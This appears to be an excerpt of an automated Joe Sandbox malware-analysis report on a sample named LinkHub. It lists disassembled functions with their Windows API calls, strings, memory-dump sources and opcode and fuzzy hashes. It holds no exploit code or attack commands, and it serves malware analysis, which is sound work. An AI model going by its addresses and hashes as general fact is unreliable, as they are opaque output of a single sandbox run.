                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: da8b81d42b1727de850ad498eb845e242ca4aa421aeec5fc2fad7780587a6a41
                                                                                        • Instruction ID: aa59ddda4d7d750d3b639fcb5ce0ed51aab55bb1292c763d9aced107071bd0a1
                                                                                        • Opcode Fuzzy Hash: da8b81d42b1727de850ad498eb845e242ca4aa421aeec5fc2fad7780587a6a41
                                                                                        • Instruction Fuzzy Hash: 69C1D5F192424AAFDB119FA8D845BADBBB4AF0A300F144095E564A7392C7B09DA1CF61

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 1354 2035b3-203623 CreateWindowExW * 2 ShowWindow * 2
                                                                                        APIs
                                                                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 002035E1
                                                                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00203602
                                                                                        • ShowWindow.USER32(00000000,?,?,?,?,?,?,00203368,?), ref: 00203616
                                                                                        • ShowWindow.USER32(00000000,?,?,?,?,?,?,00203368,?), ref: 0020361F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$CreateShow
                                                                                        • String ID: AutoIt v3$edit
                                                                                        • API String ID: 1584632944-3779509399
                                                                                        • Opcode ID: d847d8298d8fd09edd8d3526e735d21edf9221d43310df00d22ec52d1db6f2a7
                                                                                        • Instruction ID: d296fe516a7419d54450cb5615025a9d35c87511baaf31ced28a798451f70186
                                                                                        • Opcode Fuzzy Hash: d847d8298d8fd09edd8d3526e735d21edf9221d43310df00d22ec52d1db6f2a7
                                                                                        • Instruction Fuzzy Hash: 8CF03A70A01294BAEB7107177C0CE776FBDD7D6F10B00005FBA04A7160C2691C59EAB0

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 1355 271196-2711bf InterlockedExchange 1356 2711c1-2711c2 call 22017b 1355->1356 1357 2711cd-2711f6 call 22017b ReadFile 1355->1357 1360 2711c7-2711c8 1356->1360 1362 2712ae-2712b2 1357->1362 1363 2711fc-271200 1357->1363 1360->1357 1366 2712b4-2712b7 call 220184 1362->1366 1367 2712c1-2712d0 InterlockedExchange 1362->1367 1364 271206-27121b EnterCriticalSection 1363->1364 1365 2712a8-2712ab 1363->1365 1368 27121d-27122c 1364->1368 1369 271269-2712a2 call 221190 LeaveCriticalSection ReadFile 1364->1369 1365->1362 1374 2712bc-2712c0 1366->1374 1372 271234-271266 call 242430 call 22017b call 221190 call 220184 1368->1372 1373 27122e 1368->1373 1369->1363 1369->1365 1372->1369 1373->1372 1374->1367
                                                                                        APIs
                                                                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 002711B3
                                                                                        • ReadFile.KERNELBASE(?,?,0000FFFF,?,00000000), ref: 002711EE
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 0027120A
                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 00271283
                                                                                        • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0027129A
                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 002712C8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                        • String ID:
                                                                                        • API String ID: 3368777196-0
                                                                                        • Opcode ID: 76384a3a02d0506191d32e220fb018f2e92f5da51da2ca0aebe767bd799c33d3
                                                                                        • Instruction ID: 8faa7f25d1b67d7d7a75c802babd19180ccc722abf3f403f6b98f78f9eb7215b
                                                                                        • Opcode Fuzzy Hash: 76384a3a02d0506191d32e220fb018f2e92f5da51da2ca0aebe767bd799c33d3
                                                                                        • Instruction Fuzzy Hash: D4414C71910215EBDF049F94EC85AAA77B8FF44310B1480A5ED089A296D770DE71DBA4

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00245287
                                                                                          • Part of subcall function 00208577: _wcslen.LIBCMT ref: 0020858A
                                                                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00206299
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconLoadNotifyShell_String_wcslen
                                                                                        • String ID: Line %d: $AutoIt -
                                                                                        • API String ID: 2289894680-4094128768
                                                                                        • Opcode ID: 9000cf015ebfdfeea0b6b7036f72e82d70eb555557cbd821a81cb09538d8ec4b
                                                                                        • Instruction ID: c0cc8652257d82300165765e2222386ad167f7ccd93c5e08f0ff91b66550eb37
                                                                                        • Opcode Fuzzy Hash: 9000cf015ebfdfeea0b6b7036f72e82d70eb555557cbd821a81cb09538d8ec4b
                                                                                        • Instruction Fuzzy Hash: 9E41B271428311ABC721EB60EC49ADF77ACAF54310F00461EF895921D2EB709A79CB92

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 1435 238a2e-238a42 call 235737 1438 238a44-238a46 1435->1438 1439 238a48-238a50 1435->1439 1440 238a96-238ab6 call 2356a6 1438->1440 1441 238a52-238a59 1439->1441 1442 238a5b-238a5e 1439->1442 1452 238ac4 1440->1452 1453 238ab8-238ac2 call 22f613 1440->1453 1441->1442 1444 238a66-238a7a call 235737 * 2 1441->1444 1445 238a60-238a64 1442->1445 1446 238a7c-238a8c call 235737 CloseHandle 1442->1446 1444->1438 1444->1446 1445->1444 1445->1446 1446->1438 1455 238a8e-238a94 GetLastError 1446->1455 1457 238ac6-238ac9 1452->1457 1453->1457 1455->1440
                                                                                        APIs
                                                                                        • CloseHandle.KERNELBASE(00000000,00000000,?,OV$,0023894C,?,002C9CE8,0000000C,002389AB,?,OV$,?,0024564F), ref: 00238A84
                                                                                        • GetLastError.KERNEL32 ref: 00238A8E
                                                                                        • __dosmaperr.LIBCMT ref: 00238AB9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseErrorHandleLast__dosmaperr
                                                                                        • String ID: OV$
                                                                                        • API String ID: 2583163307-1415908844
                                                                                        • Opcode ID: b4cdf2edbd2fe12e704ca38c75f199ee2ff4d4df7514b2eb1143dd19da481f5d
                                                                                        • Instruction ID: 86cd7d95cfa0672aa1931293a1b24c4ce1f56ce5da0281099bf2fca354eaef0e
                                                                                        • Opcode Fuzzy Hash: b4cdf2edbd2fe12e704ca38c75f199ee2ff4d4df7514b2eb1143dd19da481f5d
                                                                                        • Instruction Fuzzy Hash: 97012B72A353706AC6246774BC4A77E67594B81734F29015BF9188F2D2DF70CDA04D90
                                                                                        APIs
                                                                                        • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,002058BE,SwapMouseButtons,00000004,?), ref: 002058EF
                                                                                        • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,002058BE,SwapMouseButtons,00000004,?), ref: 00205910
                                                                                        • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,002058BE,SwapMouseButtons,00000004,?), ref: 00205932
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseOpenQueryValue
                                                                                        • String ID: Control Panel\Mouse
                                                                                        • API String ID: 3677997916-824357125
                                                                                        • Opcode ID: 4d55f1fd6bcf3f4ab4d0689593144f0c89d0e9ddc9c2f13f077fd103c90f3064
                                                                                        • Instruction ID: 954184beb961c82f8897b305228781d9323fca1511e76670a29556b99fe79132
                                                                                        • Opcode Fuzzy Hash: 4d55f1fd6bcf3f4ab4d0689593144f0c89d0e9ddc9c2f13f077fd103c90f3064
                                                                                        • Instruction Fuzzy Hash: F7115A75520628FFDB218F64DC84EAF77B8EF00760B104419E801E7250E2319E51ABA0
                                                                                        APIs
                                                                                        • __Init_thread_footer.LIBCMT ref: 00213006
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Init_thread_footer
                                                                                        • String ID: CALL$bn&
                                                                                        • API String ID: 1385522511-2292580102
                                                                                        • Opcode ID: e933af1e188e2058329bc13b03cfe1578e2722c7eec9f3eb551ed6d3577e8209
                                                                                        • Instruction ID: 4fbe393a38d5c3f7f12b7c65b09b0efb77d16d86190df31c6a278ad6d4b7019e
                                                                                        • Opcode Fuzzy Hash: e933af1e188e2058329bc13b03cfe1578e2722c7eec9f3eb551ed6d3577e8209
                                                                                        • Instruction Fuzzy Hash: 7D229E70628202DFC714CF14D484A6ABBF1BFA8314F14495DF8998B391D771E9A5CF92
                                                                                        APIs
                                                                                        • GetOpenFileNameW.COMDLG32(?), ref: 0024413B
                                                                                          • Part of subcall function 00205851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002055D1,?,?,00244B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00205871
                                                                                          • Part of subcall function 00203A57: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00203A76
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Name$Path$FileFullLongOpen
                                                                                        • String ID: X$`u,
                                                                                        • API String ID: 779396738-3377881358
                                                                                        • Opcode ID: 7d62220be5a236013faf6ff0548070c48cfef433a9762c28fcafaabf3ab4a55b
                                                                                        • Instruction ID: e9fc3a2b2d7973cc7bb2345a19afa98e32af8453bb120c866a23e222f8af00c9
                                                                                        • Opcode Fuzzy Hash: 7d62220be5a236013faf6ff0548070c48cfef433a9762c28fcafaabf3ab4a55b
                                                                                        • Instruction Fuzzy Hash: EB21C371A202589BCB15DF94D809BEE7BFCAF48300F00805AE444B7282DBF49A998F61
                                                                                        APIs
                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 002209D8
                                                                                          • Part of subcall function 00223614: RaiseException.KERNEL32(?,?,?,002209FA,74DE2E40,?,?,?,?,?,?,?,002209FA,?,002C9758), ref: 00223674
                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 002209F5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Exception@8Throw$ExceptionRaise
                                                                                        • String ID: Unknown exception
                                                                                        • API String ID: 3476068407-410509341
                                                                                        • Opcode ID: c6a3cdd689d055cb32a836fa41662602964233d940c1cd114cf026d059b89d77
                                                                                        • Instruction ID: 435e026e86d3f819397f283697d9c370b45ea70599b4b7ad1b025dc6de3e2a7f
                                                                                        • Opcode Fuzzy Hash: c6a3cdd689d055cb32a836fa41662602964233d940c1cd114cf026d059b89d77
                                                                                        • Instruction Fuzzy Hash: 8FF0C83493022DB78B00BEE4FC86EAE776C5E01750B504164B919965E3FB70E6B9C9D0
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00288D52
                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 00288D59
                                                                                        • FreeLibrary.KERNEL32(?,?,?,?), ref: 00288F3A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$CurrentFreeLibraryTerminate
                                                                                        • String ID:
                                                                                        • API String ID: 146820519-0
                                                                                        • Opcode ID: 3abb4dbb44e7637bca8e0e87f053abaee60b75e6392dfb318ca6b3f47188ea4c
                                                                                        • Instruction ID: 117ff6402a328e2d77e33164345d2d1b5fc3dae76608d680ea931693d0463f6b
                                                                                        • Opcode Fuzzy Hash: 3abb4dbb44e7637bca8e0e87f053abaee60b75e6392dfb318ca6b3f47188ea4c
                                                                                        • Instruction Fuzzy Hash: 87128975A193019FC724DF28C484B2ABBE5BF88314F44895DF8898B292CB71E955CF92
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcslen$_strcat
                                                                                        • String ID:
                                                                                        • API String ID: 306214811-0
                                                                                        • Opcode ID: 11a635cf94adef85e5615e094106b7d6754ad2f87653cec9a6f55e1e858e9e9b
                                                                                        • Instruction ID: bb5d28b2d557bc5984b5a4c5bd1cc5769b92ed45dea38dbe8828b50071105659
                                                                                        • Opcode Fuzzy Hash: 11a635cf94adef85e5615e094106b7d6754ad2f87653cec9a6f55e1e858e9e9b
                                                                                        • Instruction Fuzzy Hash: 01A18F34610605EFCB18EF58D5C1979B7A5FF49314B24846EE80A8F692DB32EDA1CF80
                                                                                        APIs
                                                                                        • SetFilePointerEx.KERNELBASE(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,002397BA,FF8BC369,00000000,00000002,00000000), ref: 00239744
                                                                                        • GetLastError.KERNEL32(?,002397BA,FF8BC369,00000000,00000002,00000000,?,00235ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00226F41), ref: 0023974E
                                                                                        • __dosmaperr.LIBCMT ref: 00239755
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorFileLastPointer__dosmaperr
                                                                                        • String ID:
                                                                                        • API String ID: 2336955059-0
                                                                                        • Opcode ID: fba8ef6d71361390d5dae29ed3c510894c076b553dec808e9de2aa62e384e334
                                                                                        • Instruction ID: f9c76c12e2f5fccf4ea60757fed9efea7ca7d02441fde042a30766dc8d126d12
                                                                                        • Opcode Fuzzy Hash: fba8ef6d71361390d5dae29ed3c510894c076b553dec808e9de2aa62e384e334
                                                                                        • Instruction Fuzzy Hash: A0012D73630115BBCB159F99EC4586EB729DB86330F240255F815871D0E6B0DD619BD0
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32(00000030,00000000,?,00000002,00000000,?,00270B03,00000000,?,00000000,?,00243A00,00000000), ref: 00270D2E
                                                                                        • GetCurrentProcess.KERNEL32(?,00000000,?,00270B03,00000000,?,00000000,?,00243A00,00000000), ref: 00270D36
                                                                                        • DuplicateHandle.KERNELBASE(00000000,?,00270B03,00000000,?,00000000,?,00243A00,00000000), ref: 00270D3D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentProcess$DuplicateHandle
                                                                                        • String ID:
                                                                                        • API String ID: 1294930198-0
                                                                                        • Opcode ID: f3e8250316e5da29a57bd3af07bdb3d0eab6c929ae9c8610f3e4e3f627f2c1c3
                                                                                        • Instruction ID: 81ca812384a9da1f8a25559d716d6d3004d92130d85cad4aaac4dd20ffd8b870
                                                                                        • Opcode Fuzzy Hash: f3e8250316e5da29a57bd3af07bdb3d0eab6c929ae9c8610f3e4e3f627f2c1c3
                                                                                        • Instruction Fuzzy Hash: 2BD0177B150306BBC7121BE5FC4DF3B7B6CDB86B62F10805AF60D86150DAB09410AA25
                                                                                        APIs
                                                                                        • CloseHandle.KERNELBASE ref: 0022007D
                                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 0022008F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseCreateHandleSnapshotToolhelp32
                                                                                        • String ID:
                                                                                        • API String ID: 3280610774-0
                                                                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                        • Instruction ID: 90c245dbd0e78cd47fc8be7b7997d3f77ed68a33ba618e30effe75be727ae3c4
                                                                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                        • Instruction Fuzzy Hash: 8031D770A10116EFE718CF98E4C0A69F7A5FF59300B6486A5E409CB252D772EEE1CBC0
                                                                                        APIs
                                                                                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00203A3C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconNotifyShell_
                                                                                        • String ID:
                                                                                        • API String ID: 1144537725-0
                                                                                        • Opcode ID: c349a7590c6f5114ef696252aacbaa83d98f8b18f42dbc27de5f92385aabe7fd
                                                                                        • Instruction ID: a5cc82baaa92d002891b2bed5693af3a59903e21c5c12ece9eda9bb624028af1
                                                                                        • Opcode Fuzzy Hash: c349a7590c6f5114ef696252aacbaa83d98f8b18f42dbc27de5f92385aabe7fd
                                                                                        • Instruction Fuzzy Hash: 0331A570615701DFD360DF24E888797BBE8FB59318F00092EE5D987281E7B5A958CF52
                                                                                        APIs
                                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00234F04
                                                                                        • GetFileType.KERNELBASE(00000000), ref: 00234F16
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileHandleType
                                                                                        • String ID:
                                                                                        • API String ID: 3000768030-0
                                                                                        • Opcode ID: a42b96b9203d4b0a5386b0b0606f64bcbadf8173847dc8f92c34541025ff82fd
                                                                                        • Instruction ID: 1b8ee894218872d67a9a8ea372366d99ce80e42004346f3463eb969c6cd551c0
                                                                                        • Opcode Fuzzy Hash: a42b96b9203d4b0a5386b0b0606f64bcbadf8173847dc8f92c34541025ff82fd
                                                                                        • Instruction Fuzzy Hash: 5F11B7B15387424BC730AE3DAC886227A94A796334F3C079AD5B6C79F1C774FCA19640
                                                                                        APIs
                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(00000018,00000FA0,?,00000000,?,00243A00,00000000), ref: 00270AEC
                                                                                        • InterlockedExchange.KERNEL32(00000038,00000000), ref: 00270B0E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
